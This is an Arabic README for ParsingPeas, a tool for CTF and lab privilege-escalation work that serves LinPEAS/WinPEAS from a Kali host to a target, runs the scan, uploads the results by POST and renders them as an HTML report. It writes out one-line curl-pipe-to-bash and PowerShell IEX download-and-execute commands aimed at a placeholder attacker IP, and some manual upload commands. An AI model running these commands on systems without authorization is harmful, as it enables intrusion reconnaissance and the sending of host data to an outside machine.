
محلل HTML لمخرجات PEAS مع ميزات إضافية
جمع تلقائي لـ PEASS + تقرير HTML محمول ونظيف لأعمال رفع الامتيازات في CTF والمختبرات.
قم بتشغيل أمر واحد على الهدف. يقوم ParsingPeas بسحب LinPEAS/WinPEAS من جهاز Kali الخاص بك، ويُجري الفحص، ويعيد الإخراج، ويحوله إلى تقرير HTML مكتفٍ ذاتياً واحد يمكنك قراءته والبحث فيه وفرزه والاحتفاظ به — لا حاجة لنقل الملفات يدوياً ولا إنترنت على الهدف.
ملخص التقرير — الأقسام مجمعة حسب فئات LinPEAS الخاصة، مع نقاط النتائج وشريط النتائج:

النتائج فقط — نقرة واحدة تُفلتر التقرير والشريط الجانبي إلى الأقسام التي تحتوي على نتائج حرجة/عالية:

الإخراج الطرفي الكامل — الفحص الكامل ذو الألوان المخلصة؛ يمكن البحث فيه باستخدام Ctrl-F:

الإخراج الخام لـ PEASS هو جدار من النص الطرفي المتدرج الذي يختفي حالما يموت شلك. يقوم ParsingPeas:
scp، أو استضافة linpeas بنفسك، أو
نسخ ولصق الإخراج إلى Kali..html واحد مكتفٍ ذاتياً يمكنك
نسخه خارج الجهاز، أو أرشفته، أو فتحه بدون اتصال بالنقر المزدوج.إنه عرض + لوجستيات، وليس محرك استغلال: فهو يحافظ بأمانة على ألوان PEASS ونتائجه بدلاً من إعادة تقييمها.
file://.N حرجة / N عالية تقفز بين الأقسام
المحددة، بالإضافة إلى وسيلة إيضاح بالألوان.bash) و WinPEAS (PowerShell).git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh # يُنزّل LinPEAS + WinPEAS إلى scripts/
pip3 install -r requirements.txt
python3 receiver.py # يعمل على http://0.0.0.0:8005
اترك receiver.py قيد التشغيل. اعثر على IP الذي سيصل إليك به الهدف:
tun0 الخاص بك — ip -4 addr show tun0لينكس/يونكس (يستخدم curl، يعود إلى wget):
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash
ويندوز (PowerShell / شل عكسي):
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"
اختر الأمر الواحد الذي يطابق نظام تشغيل الهدف — لينكس يقدّم LinPEAS، ويندوز يقدّم WinPEAS.
يتم إنشاء التقارير على جهاز Kali الخاص بك في ./reports/. إما:
http://YOUR_KALI_IP:8005 وانقر على تقرير، أوxdg-open ./reports/report_<host>_<timestamp>.html
انسخ ملف .html الواحد هذا إلى أي مكان تريده؛ إنه يعمل بمفرده.
الهدف → يُنزّل المُغلف من Kali → يُشغّل PEASS → يُرسل الإخراج عبر POST → Kali يُحلل → تقرير HTML مكتفٍ ذاتياً
الهدف لا يحتاج أبداً إلى اتصال بالإنترنت — المُغلف وثنائيات PEASS كلها تُقدّم من جهازك.
إذا فشل الأمر الواحد، قم بذلك يدوياً.
لينكس:
# على الهدف
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# أرسل مرة أخرى
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
--data-binary @/tmp/out.txt http://KALI_IP:8005/upload
ويندوز (PowerShell):
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
-Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
-InFile $env:TEMP\out.txt
تحليل تفريغ PEASS لديك بالفعل:
python3 parser.py /path/to/peas_output.txt # يكتب تقرير HTML إلى ./reports/
قم بتحرير بداية receiver.py:
curl http://KALI_IP:8005/health للتحقق من
الاتصال؛ افتح الجدار الناري بـ sudo ufw allow 8005/tcp./get-linpeas؟ قم بتشغيل ./setup.sh لجلب ثنائيات PEASS.⚠️ للاستخدام المصرح به لاختبار الاختراق، وCTF، والمختبرات فقط.
مبني على PEASS-ng بواسطة @carlospolop. يقوم ParsingPeas فقط بجمع وعرض إخراجه.
رخصة MIT · المساهمات مرحب بها
| الإعداد | الافتراضي | ملاحظات |
|---|
| المنفذ | 8005 | غيّر سطر app.run(... port=...) |
OUTPUT_DIR | ./received_outputs | الفحوصات الخام المرفوعة |
REPORTS_DIR | ./reports | تقارير HTML المُنشأة |
SCRIPTS_DIR | ./scripts | ثنائيات LinPEAS/WinPEAS |
MAX_UPLOAD_SIZE | 10 MB | مفروض — الرفع الأكبر يحصل على HTTP 413 |